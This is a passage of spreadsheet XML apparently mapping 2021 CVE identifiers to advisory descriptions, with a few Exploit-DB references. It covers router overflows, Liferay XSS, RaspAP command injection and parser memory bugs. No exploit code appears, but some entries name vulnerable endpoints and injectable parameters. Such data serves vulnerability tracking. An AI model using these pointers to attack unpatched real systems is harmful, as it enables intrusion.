    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function sub_8003183C in /fromLogin. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-33269</t>
  </si>
  <si>
    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_8004776c in /formVirtualServ. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-3327</t>
  </si>
  <si>
    <t>Ovation Dynamic Content 1.10.1 for Elementor allows XSS via the post_title parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33270</t>
  </si>
  <si>
    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_800462c4 in /formAdvFirewall. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-33271</t>
  </si>
  <si>
    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function sub_80046EB4 in /formSetPortTr. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-33274</t>
  </si>
  <si>
    <t>D-Link DIR-809 devices with firmware through DIR-809Ax_FW1.12WWB03_20190410 were discovered to contain a stack buffer overflow vulnerability in the function FUN_80040af8 in /formWlanSetup. This vulnerability is triggered via a crafted POST request.</t>
  </si>
  <si>
    <t>CVE-2021-3328</t>
  </si>
  <si>
    <t>An issue was discovered in Aprelium Abyss Web Server X1 2.12.1 and 2.14. A crafted HTTP request can lead to an out-of-bounds read that crashes the application.</t>
  </si>
  <si>
    <t>CVE-2021-33285</t>
  </si>
  <si>
    <t>In NTFS-3G versions &lt; 2021.8.22, when a specially crafted NTFS attribute is supplied to the function ntfs_get_attribute_value, a heap buffer overflow can occur allowing for memory disclosure or denial of service. The vulnerability is caused by an out-of-bound buffer access which can be triggered by mounting a crafted ntfs partition. The root cause is a missing consistency check after reading an MFT record : the "bytes_in_use" field should be less than the "bytes_allocated" field. When it is not, the parsing of the records proceeds into the wild.</t>
  </si>
  <si>
    <t>CVE-2021-33286</t>
  </si>
  <si>
    <t>In NTFS-3G versions &lt; 2021.8.22, when a specially crafted unicode string is supplied in an NTFS image a heap buffer overflow can occur and allow for code execution.</t>
  </si>
  <si>
    <t>CVE-2021-33287</t>
  </si>
  <si>
    <t>In NTFS-3G versions &lt; 2021.8.22, when specially crafted NTFS attributes are read in the function ntfs_attr_pread_i, a heap buffer overflow can occur and allow for writing to arbitrary memory or denial of service of the application.</t>
  </si>
  <si>
    <t>CVE-2021-33289</t>
  </si>
  <si>
    <t>In NTFS-3G versions &lt; 2021.8.22, when a specially crafted MFT section is supplied in an NTFS image a heap buffer overflow can occur and allow for code execution.</t>
  </si>
  <si>
    <t>CVE-2021-33293</t>
  </si>
  <si>
    <t>Panorama Tools libpano13 v2.9.20 was discovered to contain an out-of-bounds read in the function panoParserFindOLine() in parser.c.</t>
  </si>
  <si>
    <t>CVE-2021-33295</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Joplin Desktop App before 1.8.5 allows attackers to execute aribrary code due to improper sanitizing of html.</t>
  </si>
  <si>
    <t>CVE-2021-3330</t>
  </si>
  <si>
    <t>RCE/DOS: Linked-list corruption leading to large out-of-bounds write while sorting for forged fragment list in Zephyr. Zephyr versions &gt;= &gt;=2.4.0 contain Out-of-bounds Write (CWE-787). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-fj4r-373f-9456</t>
  </si>
  <si>
    <t>CVE-2021-3331</t>
  </si>
  <si>
    <t>WinSCP before 5.17.10 allows remote attackers to execute arbitrary programs when the URL handler encounters a crafted URL that loads session settings. (For example, this is exploitable in a default installation in which WinSCP is the handler for sftp:// URLs.)</t>
  </si>
  <si>
    <t>CVE-2021-33315</t>
  </si>
  <si>
    <t>The TRENDnet TI-PG1284i switch(hw v2.0R) prior to version 2.0.2.S0 suffers from an integer underflow vulnerability. This vulnerability exists in its lldp related component. Due to lack of proper validation on length field of PortID TLV, by sending a crafted lldp packet to the device, integer underflow would occur and the negative number will be passed to memcpy() later, which may cause buffer overflow or invalid memory access.</t>
  </si>
  <si>
    <t>CVE-2021-33316</t>
  </si>
  <si>
    <t>The TRENDnet TI-PG1284i switch(hw v2.0R) prior to version 2.0.2.S0 suffers from an integer underflow vulnerability. This vulnerability exists in its lldp related component. Due to lack of proper validation on length field of ChassisID TLV, by sending a crafted lldp packet to the device, integer underflow would occur and the negative number will be passed to memcpy() later, which may cause buffer overflow or invalid memory access.</t>
  </si>
  <si>
    <t>CVE-2021-33317</t>
  </si>
  <si>
    <t>The TRENDnet TI-PG1284i switch(hw v2.0R) prior to version 2.0.2.S0 suffers from a null pointer dereference vulnerability. This vulnerability exists in its lldp related component. Due to fail to check if ChassisID TLV is contained in the packet, by sending a crafted lldp packet to the device, an attacker can crash the process due to null pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2021-33318</t>
  </si>
  <si>
    <t>An Input Validation Vulnerability exists in Joel Christner .NET C# packages WatsonWebserver, IpMatcher 1.0.4.1 and below (IpMatcher) and 4.1.3 and below (WatsonWebserver) due to insufficient validation of input IP addresses and netmasks against the internal Matcher list of IP addresses and subnets.</t>
  </si>
  <si>
    <t>CVE-2021-3332</t>
  </si>
  <si>
    <t>WPS Hide Login 1.6.1 allows remote attackers to bypass a protection mechanism via post_password.</t>
  </si>
  <si>
    <t>CVE-2021-33320</t>
  </si>
  <si>
    <t>The Flags module in Liferay Portal 7.3.1 and earlier, and Liferay DXP 7.0 before fix pack 96, 7.1 before fix pack 20, and 7.2 before fix pack 5, does not limit the rate at which content can be flagged as inappropriate, which allows remote authenticated users to spam the site administrator with emails</t>
  </si>
  <si>
    <t>CVE-2021-33321</t>
  </si>
  <si>
    <t>Insecure default configuration in Liferay Portal 6.2.3 through 7.3.2, and Liferay DXP before 7.3, allows remote attackers to enumerate user email address via the forgot password functionality. The portal.property login.secure.forgot.password should be defaulted to true.</t>
  </si>
  <si>
    <t>CVE-2021-33322</t>
  </si>
  <si>
    <t>In Liferay Portal 7.3.0 and earlier, and Liferay DXP 7.0 before fix pack 96, 7.1 before fix pack 18, and 7.2 before fix pack 5, password reset tokens are not invalidated after a user changes their password, which allows remote attackers to change the user’s password via the old password reset token.</t>
  </si>
  <si>
    <t>CVE-2021-33323</t>
  </si>
  <si>
    <t>The Dynamic Data Mapping module in Liferay Portal 7.1.0 through 7.3.2, and Liferay DXP 7.1 before fix pack 19, and 7.2 before fix pack 7, autosaves form values for unauthenticated users, which allows remote attackers to view the autosaved values by viewing the form as an unauthenticated user.</t>
  </si>
  <si>
    <t>CVE-2021-33324</t>
  </si>
  <si>
    <t>The Layout module in Liferay Portal 7.1.0 through 7.3.1, and Liferay DXP 7.1 before fix pack 20, and 7.2 before fix pack 5, does not properly check permission of pages, which allows remote authenticated users without view permission of a page to view the page via a site's page administration.</t>
  </si>
  <si>
    <t>CVE-2021-33325</t>
  </si>
  <si>
    <t>The Portal Workflow module in Liferay Portal 7.3.2 and earlier, and Liferay DXP 7.0 before fix pack 93, 7.1 before fix pack 19, and 7.2 before fix pack 7, user's clear text passwords are stored in the database if workflow is enabled for user creation, which allows attackers with access to the database to obtain a user's password.</t>
  </si>
  <si>
    <t>CVE-2021-33326</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Frontend JS module in Liferay Portal 7.3.4 and earlier, and Liferay DXP 7.0 before fix pack 96, 7.1 before fix pack 20 and 7.2 before fix pack 9, allows remote attackers to inject arbitrary web script or HTML via the title of a modal window.</t>
  </si>
  <si>
    <t>CVE-2021-33327</t>
  </si>
  <si>
    <t>The Portlet Configuration module in Liferay Portal 7.2.0 through 7.3.3, and Liferay DXP 7.0 fix pack pack 93 and 94, 7.1 fix pack 18, and 7.2 before fix pack 8, does not properly check user permission, which allows remote authenticated users to view the Guest and User role even if "Role Visibility" is enabled.</t>
  </si>
  <si>
    <t>CVE-2021-33328</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Asset module's edit vocabulary page in Liferay Portal 7.0.0 through 7.3.4, and Liferay DXP 7.0 before fix pack 96, 7.1 before fix pack 20, and 7.2 before fix pack 9, allows remote attackers to inject arbitrary web script or HTML via the (1) _com_liferay_journal_web_portlet_JournalPortlet_name or (2) _com_liferay_document_library_web_portlet_DLAdminPortlet_name parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3333</t>
  </si>
  <si>
    <t>Opmantek Open-AudIT 4.0.1 is affected by cross-site scripting (XSS). When outputting SQL statements for debugging, a maliciously crafted query can trigger an XSS attack. This attack only succeeds if the user is already logged in to Open-AudIT before they click the malicious link.</t>
  </si>
  <si>
    <t>CVE-2021-33330</t>
  </si>
  <si>
    <t>Liferay Portal 7.2.0 through 7.3.2, and Liferay DXP 7.2 before fix pack 9, allows access to Cross-origin resource sharing (CORS) protected resources if the user is only authenticated using the portal session authentication, which allows remote attackers to obtain sensitive information including the targeted user’s email address and current CSRF token.</t>
  </si>
  <si>
    <t>CVE-2021-33331</t>
  </si>
  <si>
    <t>Open redirect vulnerability in the Notifications module in Liferay Portal 7.0.0 through 7.3.1, and Liferay DXP 7.0 before fix pack 94, 7.1 before fix pack 19 and 7.2 before fix pack 8, allows remote attackers to redirect users to arbitrary external URLs via the 'redirect' parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33332</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Portlet Configuration module in Liferay Portal 7.1.0 through 7.3.2, and Liferay DXP 7.1 before fix pack 19, and 7.2 before fix pack 7, allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_portlet_configuration_css_web_portlet_PortletConfigurationCSSPortlet_portletResource parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33333</t>
  </si>
  <si>
    <t>The Portal Workflow module in Liferay Portal 7.3.2 and earlier, and Liferay DXP 7.0 before fix pack 93, 7.1 before fix pack 19 and 7.2 before fix pack 6, does not properly check user permission, which allows remote authenticated users to view and delete workflow submissions via crafted URLs.</t>
  </si>
  <si>
    <t>CVE-2021-33334</t>
  </si>
  <si>
    <t>The Dynamic Data Mapping module in Liferay Portal 7.0.0 through 7.3.2, and Liferay DXP 7.0 before fix pack 94, 7.1 before fix pack 19, and 7.2 before fix pack 6, does not properly check user permissions, which allows remote attackers with the forms "Access in Site Administration" permission to view all forms and form entries in a site via the forms section in site administration.</t>
  </si>
  <si>
    <t>CVE-2021-33335</t>
  </si>
  <si>
    <t>Privilege escalation vulnerability in Liferay Portal 7.0.3 through 7.3.4, and Liferay DXP 7.1 before fix pack 20, and 7.2 before fix pack 9 allows remote authenticated users with permission to update/edit users to take over a company administrator user account by editing the company administrator user.</t>
  </si>
  <si>
    <t>CVE-2021-33336</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Journal module's add article menu in Liferay Portal 7.3.0 through 7.3.3, and Liferay DXP 7.1 fix pack 18, and 7.2 fix pack 5 through 7, allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_journal_web_portlet_JournalPortlet_name parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33337</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Document Library module's add document menu in Liferay Portal 7.3.0 through 7.3.4, and Liferay DXP 7.1 before fix pack 20, and 7.2 before fix pack 9, allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_document_library_web_portlet_DLAdminPortlet_name parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33338</t>
  </si>
  <si>
    <t>The Layout module in Liferay Portal 7.1.0 through 7.3.2, and Liferay DXP 7.1 before fix pack 19, and 7.2 before fix pack 6, exposes the CSRF token in URLs, which allows man-in-the-middle attackers to obtain the token and conduct Cross-Site Request Forgery (CSRF) attacks via the p_auth parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33339</t>
  </si>
  <si>
    <t>Cross-site scripting (XSS) vulnerability in the Fragment module in Liferay Portal 7.2.1 through 7.3.4, and Liferay DXP 7.2 before fix pack 9 allows remote attackers to inject arbitrary web script or HTML via the _com_liferay_site_admin_web_portlet_SiteAdminPortlet_name parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33346</t>
  </si>
  <si>
    <t>There is an arbitrary password modification vulnerability in a D-LINK DSL-2888A router product. An attacker can use this vulnerability to modify the password of the admin user without authorization.</t>
  </si>
  <si>
    <t>CVE-2021-33347</t>
  </si>
  <si>
    <t>An issue was discovered in JPress v3.3.0 and below. There are XSS vulnerabilities in the template module and tag management module. If you log in to the background by means of weak password, the storage XSS vulnerability can occur.</t>
  </si>
  <si>
    <t>CVE-2021-33348</t>
  </si>
  <si>
    <t>An issue was discovered in JFinal framework v4.9.10 and below. The "set" method of the "Controller" class of jfinal framework is not strictly filtered, which will lead to XSS vulnerabilities in some cases.</t>
  </si>
  <si>
    <t>CVE-2021-33354</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability in htmly before 2.8.1 allows remote attackers to perform arbitrary file deletions via modified file parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33356</t>
  </si>
  <si>
    <t>Multiple privilege escalation vulnerabilities in RaspAP 1.5 to 2.6.5 could allow an authenticated remote attacker to inject arbitrary commands to /installers/common.sh component that can result in remote command execution with root privileges.</t>
  </si>
  <si>
    <t>CVE-2021-33357</t>
  </si>
  <si>
    <t>A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.</t>
  </si>
  <si>
    <t>CVE-2021-33358</t>
  </si>
  <si>
    <t>Multiple vulnerabilities exist in RaspAP 2.3 to 2.6.5 in the "interface", "ssid" and "wpa_passphrase" POST parameters in /hostapd, when the parameter values contain special characters such as ";" or "$()" which enables an authenticated attacker to execute arbitrary OS commands.</t>
  </si>
  <si>
    <t>CVE-2021-33359</t>
  </si>
  <si>
    <t>A vulnerability exists in gowitness &lt; 2.3.6 that allows an unauthenticated attacker to perform an arbitrary file read using the file:// scheme in the url parameter to get an image of any file.</t>
  </si>
  <si>
    <t>CVE-2021-3336</t>
  </si>
  <si>
    <t>DoTls13CertificateVerify in tls13.c in wolfSSL before 4.7.0 does not cease processing for certain anomalous peer behavior (sending an ED22519, ED448, ECC, or RSA signature without the corresponding certificate). The client side is affected because man-in-the-middle attackers can impersonate TLS 1.3 servers.</t>
  </si>
  <si>
    <t>CVE-2021-33361</t>
  </si>
  <si>
    <t>Memory leak in the afra_box_read function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-33362</t>
  </si>
  <si>
    <t>Stack buffer overflow in the hevc_parse_vps_extension function in MP4Box in GPAC 1.0.1 allows attackers to cause a denial of service or execute arbitrary code via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-33363</t>
  </si>
  <si>
    <t>Memory leak in the infe_box_read function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-33364</t>
  </si>
  <si>
    <t>Memory leak in the def_parent_box_new function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-33365</t>
  </si>
  <si>
    <t>Memory leak in the gf_isom_get_root_od function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-33366</t>
  </si>
  <si>
    <t>Memory leak in the gf_isom_oinf_read_entry function in MP4Box in GPAC 1.0.1 allows attackers to read memory via a crafted file.</t>
  </si>
  <si>
    <t>CVE-2021-3337</t>
  </si>
  <si>
    <t>The Hide-Thread-Content plugin through 2021-01-27 for MyBB allows remote attackers to bypass intended content-reading restrictions by clicking on reply or quote in the postbit.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49496.txt</t>
  </si>
  <si>
    <t>MyBB Hide Thread Content Plugin 1.0 - Information Disclosure</t>
  </si>
  <si>
    <t>2021-01-29</t>
  </si>
  <si>
    <t>CVE-2021-33371</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in /nav_bar_action.php of Student Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Chat box.</t>
  </si>
  <si>
    <t>CVE-2021-3339</t>
  </si>
  <si>
    <t>ModernFlow before 1.3.00.208 does not constrain web-page access to members of a security group, as demonstrated by the Search Screen and the Profile Screen.</t>
  </si>
  <si>
    <t>exploits/cgi/webapps/49869.py</t>
  </si>
  <si>
    <t>IPFire 2.25 - Remote Code Execution (Authenticated)</t>
  </si>
  <si>
    <t>2021-05-17</t>
  </si>
  <si>
    <t>CVE-2021-33393</t>
  </si>
  <si>
    <t>lfs/backup in IPFire 2.25-core155 does not ensure that /var/ipfire/backup/bin/backup.pl is owned by the root account. It might be owned by an unprivileged account, which could potentially be used to install a Trojan horse backup.pl script that is later executed by root. Similar problems with the ownership/permissions of other files may be present as well.</t>
  </si>
  <si>
    <t>CVE-2021-33394</t>
  </si>
  <si>
    <t>Cubecart 6.4.2 allows Session Fixation. The application does not generate a new session cookie after the user is logged in. A malicious user is able to create a new session cookie value and inject it to a victim. After the victim logs in, the injected cookie becomes valid, giving the attacker access to the user's account through the active session.</t>
  </si>
  <si>
    <t>CVE-2021-3340</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in many forms of Wikindx before 5.7.0 and 6.x through 6.4.0 allows remote attackers to inject arbitrary web script or HTML via the message parameter to index.php?action=initLogon or modules/admin/DELETEIMAGES.php.</t>
  </si>
  <si>
    <t>CVE-2021-33403</t>
  </si>
  <si>
    <t>An integer overflow in the transfer function of a smart contract implementation for Lancer Token, an Ethereum ERC20 token, allows the owner to cause unexpected financial losses between two large accounts during a transaction.</t>
  </si>
  <si>
    <t>CVE-2021-33408</t>
  </si>
  <si>
    <t>Local File Inclusion vulnerability in Ab Initio Control&gt;Center before 4.0.2.6 allows remote attackers to retrieve arbitrary files. Fixed in v4.0.2.6 and v4.0.3.1.</t>
  </si>
  <si>
    <t>CVE-2021-3341</t>
  </si>
  <si>
    <t>A path traversal vulnerability in the DxWebEngine component of DH2i DxEnterprise and DxOdyssey for Windows, version 19.5 through 20.x before 20.0.219.0, allows an attacker to read any file on the host file system via an HTTP request.</t>
  </si>
  <si>
    <t>CVE-2021-3342</t>
  </si>
  <si>
    <t>EPrints 3.4.2 allows remote attackers to read arbitrary files and possibly execute commands via crafted LaTeX input to a cgi/latex2png?latex= URI.</t>
  </si>
  <si>
    <t>CVE-2021-33425</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability was discovered in the Web Interface for OpenWRT LuCI version 19.07 which allows attackers to inject arbitrary Javascript in the OpenWRT Hostname via the Hostname Change operation.</t>
  </si>
  <si>
    <t>CVE-2021-33430</t>
  </si>
  <si>
    <t>** DISPUTED ** A Buffer Overflow vulnerability exists in NumPy 1.9.x in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code, which could let a malicious user cause a Denial of Service. NOTE: The vendor does not agree this is a vulneraility; In (very limited) circumstances a user may be able provoke the buffer overflow, the user is most likely already privileged to at least provoke denial of service by exhausting memory. Triggering this further requires the use of uncommon API (complicated structured dtypes), which is very unlikely to be available to an unprivileged user.</t>
  </si>
  <si>
    <t>CVE-2021-33436</t>
  </si>
  <si>
    <t>NoMachine for Windows prior to version 6.15.1 and 7.5.2 suffer from local privilege escalation due to the lack of safe DLL loading. This vulnerability allows local non-privileged users to perform DLL Hijacking via any writable directory listed under the system path and ultimately execute code as NT AUTHORITY\SYSTEM.</t>
  </si>
  <si>
    <t>CVE-2021-33437</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There are memory leaks in frozen_cb() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33438</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in json_parse_array() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33439</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is Integer overflow in gc_compact_strings() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-3344</t>
  </si>
  <si>
    <t>A privilege escalation flaw was found in OpenShift builder. During build time, credentials outside the build context are automatically mounted into the container image under construction. An OpenShift user, able to execute code during build time inside this container can re-use the credentials to overwrite arbitrary container images in internal registries and/or escalate their privileges. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. This affects github.com/openshift/builder v0.0.0-20210125201112-7901cb396121 and before.</t>
  </si>
  <si>
    <t>CVE-2021-33440</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_bcode_commit() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33441</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in exec_expr() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33442</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in json_printf() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33443</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow in mjs_execute() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33444</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in getprop_builtin_foreign() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33445</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_string_char_code_at() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33446</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_next() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33447</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_print() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-33448</t>
  </si>
  <si>
    <t>An issue was discovered in mjs(mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is stack buffer overflow at 0x7fffe9049390.</t>
  </si>
  <si>
    <t>CVE-2021-33449</t>
  </si>
  <si>
    <t>An issue was discovered in mjs (mJS: Restricted JavaScript engine), ES6 (JavaScript version 6). There is NULL pointer dereference in mjs_bcode_part_get_by_offset() in mjs.c.</t>
  </si>
  <si>
    <t>CVE-2021-3345</t>
  </si>
  <si>
    <t>_gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count value. It is recommended to upgrade to 1.9.1 or later.</t>
  </si>
  <si>
    <t>CVE-2021-33450</t>
  </si>
  <si>
    <t>An issue was discovered in NASM version 2.16rc0. There are memory leaks in nasm_calloc() in nasmlib/alloc.c.</t>
  </si>
  <si>
    <t>CVE-2021-33451</t>
  </si>
  <si>
    <t>An issue was discovered in lrzip version 0.641. There are memory leaks in fill_buffer() in stream.c.</t>
  </si>
  <si>
    <t>CVE-2021-33452</t>
  </si>
  <si>
    <t>An issue was discovered in NASM version 2.16rc0. There are memory leaks in nasm_malloc() in nasmlib/alloc.c.</t>
  </si>
  <si>
    <t>CVE-2021-33453</t>
  </si>
  <si>
    <t>An issue was discovered in lrzip version 0.641. There is a use-after-free in ucompthread() in stream.c:1538.</t>
  </si>
  <si>
    <t>CVE-2021-33454</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr_get_intnum() in libyasm/expr.c.</t>
  </si>
  <si>
    <t>CVE-2021-33455</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in do_directive() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33456</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in hash() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33457</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_mmac_params() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33458</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in find_cc() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33459</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in nasm_parser_directive() in modules/parsers/nasm/nasm-parse.c.</t>
  </si>
  <si>
    <t>CVE-2021-3346</t>
  </si>
  <si>
    <t>Foris before 101.1.1, as used in Turris OS, lacks certain HTML escaping in the login template.</t>
  </si>
  <si>
    <t>CVE-2021-33460</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in if_condition() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33461</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a use-after-free in yasm_intnum_destroy() in libyasm/intnum.c.</t>
  </si>
  <si>
    <t>CVE-2021-33462</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a use-after-free in expr_traverse_nodes_post() in libyasm/expr.c.</t>
  </si>
  <si>
    <t>CVE-2021-33463</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in yasm_expr__copy_except() in libyasm/expr.c.</t>
  </si>
  <si>
    <t>CVE-2021-33464</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a heap-buffer-overflow in inc_fopen() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33465</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_mmacro() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33466</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a NULL pointer dereference in expand_smacro() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33467</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a use-after-free in pp_getline() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33468</t>
  </si>
  <si>
    <t>An issue was discovered in yasm version 1.3.0. There is a use-after-free in error() in modules/preprocs/nasm/nasm-pp.c.</t>
  </si>
  <si>
    <t>CVE-2021-33469</t>
  </si>
  <si>
    <t>COVID19 Testing Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the "Admin name" parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3347</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel through 5.10.11. PI futexes have a kernel stack use-after-free during fault handling, allowing local users to execute code in the kernel, aka CID-34b1a1ce1458.</t>
  </si>
  <si>
    <t>CVE-2021-33470</t>
  </si>
  <si>
    <t>COVID19 Testing Management System 1.0 is vulnerable to SQL Injection via the admin panel.</t>
  </si>
  <si>
    <t>CVE-2021-33473</t>
  </si>
  <si>
    <t>An argument injection vulnerability in Dragonfly Ruby Gem v1.3.0 allows attackers to read and write arbitrary files when the verify_url option is disabled. This vulnerability is exploited via a crafted URL.</t>
  </si>
  <si>
    <t>CVE-2021-33477</t>
  </si>
  <si>
    <t>rxvt-unicode 9.22, rxvt 2.7.10, mrxvt 0.5.4, and Eterm 0.9.7 allow (potentially remote) code execution because of improper handling of certain escape sequences (ESC G Q). A response is terminated by a newline.</t>
  </si>
  <si>
    <t>CVE-2021-33478</t>
  </si>
  <si>
    <t>The TrustZone implementation in certain Broadcom MediaxChange firmware could allow an unauthenticated, physically proximate attacker to achieve arbitrary code execution in the TrustZone Trusted Execution Environment (TEE) of an affected device. This, for example, affects certain Cisco IP Phone and Wireless IP Phone products before 2021-07-07. Exploitation is possible only when the attacker can disassemble the device in order to control the voltage/current for chip pins.</t>
  </si>
  <si>
    <t>CVE-2021-33479</t>
  </si>
  <si>
    <t>A stack-based buffer overflow vulnerability was discovered in gocr through 0.53-20200802 in measure_pitch() in pgm2asc.c.</t>
  </si>
  <si>
    <t>CVE-2021-3348</t>
  </si>
  <si>
    <t>nbd_add_socket in drivers/block/nbd.c in the Linux kernel through 5.10.12 has an ndb_queue_rq use-after-free that could be triggered by local attackers (with access to the nbd device) via an I/O request at a certain point during device setup, aka CID-b98e762e3d71.</t>
  </si>
  <si>
    <t>CVE-2021-33480</t>
  </si>
  <si>
    <t>An use-after-free vulnerability was discovered in gocr through 0.53-20200802 in context_correction() in pgm2asc.c.</t>
  </si>
  <si>
    <t>CVE-2021-33481</t>
  </si>
  <si>
